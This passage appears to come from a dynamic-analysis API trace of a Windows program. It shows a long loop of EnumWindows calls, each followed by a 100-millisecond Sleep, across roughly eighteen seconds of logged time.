(lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0240.607] Sleep (dwMilliseconds=0x64) [0240.624] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0240.624] Sleep (dwMilliseconds=0x64) [0240.672] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0240.672] Sleep (dwMilliseconds=0x64) [0240.735] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0240.735] Sleep (dwMilliseconds=0x64) [0240.777] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0240.778] Sleep (dwMilliseconds=0x64) [0240.887] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0240.888] Sleep (dwMilliseconds=0x64) [0240.985] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0240.985] Sleep (dwMilliseconds=0x64) [0241.073] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0241.076] Sleep (dwMilliseconds=0x64) [0241.113] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0241.114] Sleep (dwMilliseconds=0x64) [0241.120] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0241.120] Sleep (dwMilliseconds=0x64) [0241.136] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0241.139] Sleep (dwMilliseconds=0x64) [0241.186] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0241.186] Sleep (dwMilliseconds=0x64) [0241.255] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0241.255] Sleep (dwMilliseconds=0x64) [0241.404] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0241.404] Sleep (dwMilliseconds=0x64) [0241.528] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0241.529] Sleep (dwMilliseconds=0x64) [0241.668] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0241.668] Sleep (dwMilliseconds=0x64) [0241.761] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0241.762] Sleep (dwMilliseconds=0x64) [0241.887] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0241.888] Sleep (dwMilliseconds=0x64) [0242.042] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0242.042] Sleep (dwMilliseconds=0x64) [0242.215] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0242.215] Sleep (dwMilliseconds=0x64) [0242.323] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0242.324] Sleep (dwMilliseconds=0x64) [0242.470] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0242.470] Sleep (dwMilliseconds=0x64) [0242.503] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0242.503] Sleep (dwMilliseconds=0x64) [0242.514] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0242.515] Sleep (dwMilliseconds=0x64) [0242.529] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0242.530] Sleep (dwMilliseconds=0x64) [0242.577] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0242.577] Sleep (dwMilliseconds=0x64) [0242.671] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0242.672] Sleep (dwMilliseconds=0x64) [0242.717] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0242.718] Sleep (dwMilliseconds=0x64) [0242.761] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0242.765] Sleep (dwMilliseconds=0x64) [0242.859] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0242.859] Sleep (dwMilliseconds=0x64) [0242.953] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0242.954] Sleep (dwMilliseconds=0x64) [0242.999] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0242.999] Sleep (dwMilliseconds=0x64) [0243.044] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0243.045] Sleep (dwMilliseconds=0x64) [0243.081] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0243.082] Sleep (dwMilliseconds=0x64) [0243.091] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0243.092] Sleep (dwMilliseconds=0x64) [0243.155] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0243.155] Sleep (dwMilliseconds=0x64) [0243.280] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0243.281] Sleep (dwMilliseconds=0x64) [0243.359] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0243.359] Sleep (dwMilliseconds=0x64) [0243.433] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0243.436] Sleep (dwMilliseconds=0x64) [0243.530] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0243.530] Sleep (dwMilliseconds=0x64) [0243.552] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0243.553] Sleep (dwMilliseconds=0x64) [0243.560] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0243.560] Sleep (dwMilliseconds=0x64) [0243.632] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0243.633] Sleep (dwMilliseconds=0x64) [0243.706] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0243.708] Sleep (dwMilliseconds=0x64) [0243.903] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0243.904] Sleep (dwMilliseconds=0x64) [0243.997] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0243.998] Sleep (dwMilliseconds=0x64) [0244.216] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0244.216] Sleep (dwMilliseconds=0x64) [0244.273] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0244.277] Sleep (dwMilliseconds=0x64) [0244.409] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0244.514] Sleep (dwMilliseconds=0x64) [0244.608] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0244.608] Sleep (dwMilliseconds=0x64) [0244.702] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0244.702] Sleep (dwMilliseconds=0x64) [0244.793] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0244.794] Sleep (dwMilliseconds=0x64) [0244.846] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0244.846] Sleep (dwMilliseconds=0x64) [0244.871] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0244.871] Sleep (dwMilliseconds=0x64) [0244.920] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0244.920] Sleep (dwMilliseconds=0x64) [0244.937] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0244.937] Sleep (dwMilliseconds=0x64) [0245.027] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0245.030] Sleep (dwMilliseconds=0x64) [0245.123] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0245.124] Sleep (dwMilliseconds=0x64) [0245.182] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0245.183] Sleep (dwMilliseconds=0x64) [0245.357] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0245.358] Sleep (dwMilliseconds=0x64) [0245.390] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0245.390] Sleep (dwMilliseconds=0x64) [0245.419] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0245.419] Sleep (dwMilliseconds=0x64) [0245.511] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0245.513] Sleep (dwMilliseconds=0x64) [0245.562] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0245.562] Sleep (dwMilliseconds=0x64) [0245.607] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0245.608] Sleep (dwMilliseconds=0x64) [0245.701] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0245.701] Sleep (dwMilliseconds=0x64) [0245.776] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0245.777] Sleep (dwMilliseconds=0x64) [0245.797] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0245.797] Sleep (dwMilliseconds=0x64) [0245.854] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0245.855] Sleep (dwMilliseconds=0x64) [0245.902] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0245.902] Sleep (dwMilliseconds=0x64) [0245.980] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0245.981] Sleep (dwMilliseconds=0x64) [0246.030] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0246.030] Sleep (dwMilliseconds=0x64) [0246.123] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0246.123] Sleep (dwMilliseconds=0x64) [0246.202] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0246.202] Sleep (dwMilliseconds=0x64) [0246.231] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0246.232] Sleep (dwMilliseconds=0x64) [0246.280] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0246.280] Sleep (dwMilliseconds=0x64) [0246.306] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0246.306] Sleep (dwMilliseconds=0x64) [0246.328] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0246.329] Sleep (dwMilliseconds=0x64) [0246.374] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0246.374] Sleep (dwMilliseconds=0x64) [0246.499] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0246.499] Sleep (dwMilliseconds=0x64) [0246.545] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0246.546] Sleep (dwMilliseconds=0x64) [0246.594] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0246.594] Sleep (dwMilliseconds=0x64) [0246.632] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0246.632] Sleep (dwMilliseconds=0x64) [0246.724] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0246.728] Sleep (dwMilliseconds=0x64) [0246.748] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0246.749] Sleep (dwMilliseconds=0x64) [0246.791] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0246.792] Sleep (dwMilliseconds=0x64) [0246.850] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0246.853] Sleep (dwMilliseconds=0x64) [0246.940] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0246.941] Sleep (dwMilliseconds=0x64) [0247.029] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0247.030] Sleep (dwMilliseconds=0x64) [0247.118] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0247.118] Sleep (dwMilliseconds=0x64) [0247.202] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0247.203] Sleep (dwMilliseconds=0x64) [0247.370] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0247.371] Sleep (dwMilliseconds=0x64) [0247.458] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0247.458] Sleep (dwMilliseconds=0x64) [0247.561] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0247.562] Sleep (dwMilliseconds=0x64) [0247.689] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0247.689] Sleep (dwMilliseconds=0x64) [0247.764] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0247.765] Sleep (dwMilliseconds=0x64) [0247.853] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0247.853] Sleep (dwMilliseconds=0x64) [0247.967] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0247.968] Sleep (dwMilliseconds=0x64) [0248.050] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0248.050] Sleep (dwMilliseconds=0x64) [0248.101] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0248.102] Sleep (dwMilliseconds=0x64) [0248.164] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0248.165] Sleep (dwMilliseconds=0x64) [0248.218] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0248.218] Sleep (dwMilliseconds=0x64) [0248.259] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0248.259] Sleep (dwMilliseconds=0x64) [0248.265] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0248.265] Sleep (dwMilliseconds=0x64) [0248.309] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0248.309] Sleep (dwMilliseconds=0x64) [0248.418] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0248.418] Sleep (dwMilliseconds=0x64) [0248.685] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0248.686] Sleep (dwMilliseconds=0x64) [0248.766] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0248.767] Sleep (dwMilliseconds=0x64) [0248.893] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0248.893] Sleep (dwMilliseconds=0x64) [0248.932] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0248.933] Sleep (dwMilliseconds=0x64) [0248.998] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0248.998] Sleep (dwMilliseconds=0x64) [0249.030] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0249.030] Sleep (dwMilliseconds=0x64) [0249.044] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0249.045] Sleep (dwMilliseconds=0x64) [0249.106] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0249.107] Sleep (dwMilliseconds=0x64) [0249.202] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0249.202] Sleep (dwMilliseconds=0x64) [0249.278] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0249.279] Sleep (dwMilliseconds=0x64) [0249.342] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0249.342] Sleep (dwMilliseconds=0x64) [0249.405] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0249.405] Sleep (dwMilliseconds=0x64) [0249.434] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0249.434] Sleep (dwMilliseconds=0x64) [0249.510] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0249.513] Sleep (dwMilliseconds=0x64) [0249.670] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0249.674] Sleep (dwMilliseconds=0x64) [0249.795] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0249.795] Sleep (dwMilliseconds=0x64) [0249.949] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0249.949] Sleep (dwMilliseconds=0x64) [0250.121] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0250.121] Sleep (dwMilliseconds=0x64) [0250.201] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0250.202] Sleep (dwMilliseconds=0x64) [0250.236] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0250.236] Sleep (dwMilliseconds=0x64) [0250.245] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0250.246] Sleep (dwMilliseconds=0x64) [0250.263] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0250.264] Sleep (dwMilliseconds=0x64) [0250.374] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0250.374] Sleep (dwMilliseconds=0x64) [0250.432] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0250.432] Sleep (dwMilliseconds=0x64) [0250.530] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0250.530] Sleep (dwMilliseconds=0x64) [0250.628] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0250.628] Sleep (dwMilliseconds=0x64) [0250.674] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0250.674] Sleep (dwMilliseconds=0x64) [0250.716] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0250.717] Sleep (dwMilliseconds=0x64) [0250.753] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0250.754] Sleep (dwMilliseconds=0x64) [0250.760] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0250.761] Sleep (dwMilliseconds=0x64) [0250.826] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0250.827] Sleep (dwMilliseconds=0x64) [0250.921] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0250.921] Sleep (dwMilliseconds=0x64) [0250.999] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0250.999] Sleep (dwMilliseconds=0x64) [0251.123] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0251.124] Sleep (dwMilliseconds=0x64) [0251.197] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0251.230] Sleep (dwMilliseconds=0x64) [0251.336] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0251.337] Sleep (dwMilliseconds=0x64) [0251.435] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0251.436] Sleep (dwMilliseconds=0x64) [0251.510] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0251.511] Sleep (dwMilliseconds=0x64) [0251.575] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0251.575] Sleep (dwMilliseconds=0x64) [0251.663] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0251.664] Sleep (dwMilliseconds=0x64) [0251.680] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0251.683] Sleep (dwMilliseconds=0x64) [0251.716] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0251.716] Sleep (dwMilliseconds=0x64) [0251.756] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0251.756] Sleep (dwMilliseconds=0x64) [0251.765] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0251.765] Sleep (dwMilliseconds=0x64) [0251.935] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) returned 1 [0251.957] Sleep (dwMilliseconds=0x64) [0252.065] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0252.066] Sleep (dwMilliseconds=0x64) [0252.183] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0252.184] Sleep (dwMilliseconds=0x64) [0252.313] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0252.313] Sleep (dwMilliseconds=0x64) [0252.422] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0252.422] Sleep (dwMilliseconds=0x64) [0252.532] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0252.532] Sleep (dwMilliseconds=0x64) [0252.602] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0252.603] Sleep (dwMilliseconds=0x64) [0252.655] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0252.655] Sleep (dwMilliseconds=0x64) [0252.702] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0252.704] Sleep (dwMilliseconds=0x64) [0252.738] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0252.738] Sleep (dwMilliseconds=0x64) [0252.783] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0252.783] Sleep (dwMilliseconds=0x64) [0252.889] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0252.890] Sleep (dwMilliseconds=0x64) [0252.966] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0252.967] Sleep (dwMilliseconds=0x64) [0253.061] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0253.062] Sleep (dwMilliseconds=0x64) [0253.136] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0253.136] Sleep (dwMilliseconds=0x64) [0253.155] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0253.156] Sleep (dwMilliseconds=0x64) [0253.201] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0253.202] Sleep (dwMilliseconds=0x64) [0253.249] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0253.249] Sleep (dwMilliseconds=0x64) [0253.404] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0253.404] Sleep (dwMilliseconds=0x64) [0253.498] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0253.499] Sleep (dwMilliseconds=0x64) [0253.589] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0253.592] Sleep (dwMilliseconds=0x64) [0253.677] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0253.680] Sleep (dwMilliseconds=0x64) [0253.705] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0253.705] Sleep (dwMilliseconds=0x64) [0253.749] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0253.749] Sleep (dwMilliseconds=0x64) [0253.782] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0253.783] Sleep (dwMilliseconds=0x64) [0253.792] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0253.792] Sleep (dwMilliseconds=0x64) [0253.872] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0253.873] Sleep (dwMilliseconds=0x64) [0253.967] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0253.968] Sleep (dwMilliseconds=0x64) [0254.029] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0254.030] Sleep (dwMilliseconds=0x64) [0254.108] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0254.108] Sleep (dwMilliseconds=0x64) [0254.201] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0254.201] Sleep (dwMilliseconds=0x64) [0254.264] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0254.265] Sleep (dwMilliseconds=0x64) [0254.296] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0254.296] Sleep (dwMilliseconds=0x64) [0254.311] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0254.311] Sleep (dwMilliseconds=0x64) [0254.370] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0254.371] Sleep (dwMilliseconds=0x64) [0254.499] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0254.500] Sleep (dwMilliseconds=0x64) [0254.577] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0254.578] Sleep (dwMilliseconds=0x64) [0254.671] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0254.671] Sleep (dwMilliseconds=0x64) [0254.820] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0254.821] Sleep (dwMilliseconds=0x64) [0254.837] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0254.837] Sleep (dwMilliseconds=0x64) [0254.838] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0254.839] Sleep (dwMilliseconds=0x64) [0254.889] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0254.890] Sleep (dwMilliseconds=0x64) [0254.927] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0254.928] Sleep (dwMilliseconds=0x64) [0254.933] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0254.933] Sleep (dwMilliseconds=0x64) [0254.951] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0254.951] Sleep (dwMilliseconds=0x64) [0255.046] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0255.046] Sleep (dwMilliseconds=0x64) [0255.137] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0255.138] Sleep (dwMilliseconds=0x64) [0255.231] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0255.232] Sleep (dwMilliseconds=0x64) [0255.327] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0255.328] Sleep (dwMilliseconds=0x64) [0255.405] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0255.405] Sleep (dwMilliseconds=0x64) [0255.534] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0255.535] Sleep (dwMilliseconds=0x64) [0255.623] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0255.623] Sleep (dwMilliseconds=0x64) [0255.687] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0255.687] Sleep (dwMilliseconds=0x64) [0255.758] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0255.759] Sleep (dwMilliseconds=0x64) [0255.830] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0255.831] Sleep (dwMilliseconds=0x64) [0255.925] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0255.925] Sleep (dwMilliseconds=0x64) [0256.100] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0256.101] Sleep (dwMilliseconds=0x64) [0256.128] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0256.128] Sleep (dwMilliseconds=0x64) [0256.167] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0256.168] Sleep (dwMilliseconds=0x64) [0256.201] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0256.201] Sleep (dwMilliseconds=0x64) [0256.214] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0256.214] Sleep (dwMilliseconds=0x64) [0256.277] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0256.277] Sleep (dwMilliseconds=0x64) [0256.376] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0256.379] Sleep (dwMilliseconds=0x64) [0256.467] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0256.468] Sleep (dwMilliseconds=0x64) [0256.562] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0256.563] Sleep (dwMilliseconds=0x64) [0256.630] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0256.630] Sleep (dwMilliseconds=0x64) [0256.638] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0256.638] Sleep (dwMilliseconds=0x64) [0256.662] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0256.662] Sleep (dwMilliseconds=0x64) [0256.716] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0256.717] Sleep (dwMilliseconds=0x64) [0256.928] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0256.929] Sleep (dwMilliseconds=0x64) [0257.089] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0257.090] Sleep (dwMilliseconds=0x64) [0257.324] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0257.324] Sleep (dwMilliseconds=0x64) [0257.478] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0257.478] Sleep (dwMilliseconds=0x64) [0257.665] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0257.665] Sleep (dwMilliseconds=0x64) [0257.754] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0257.755] Sleep (dwMilliseconds=0x64) [0257.923] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0257.930] Sleep (dwMilliseconds=0x64) [0258.057] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0258.058] Sleep (dwMilliseconds=0x64) [0258.159] EnumWindows 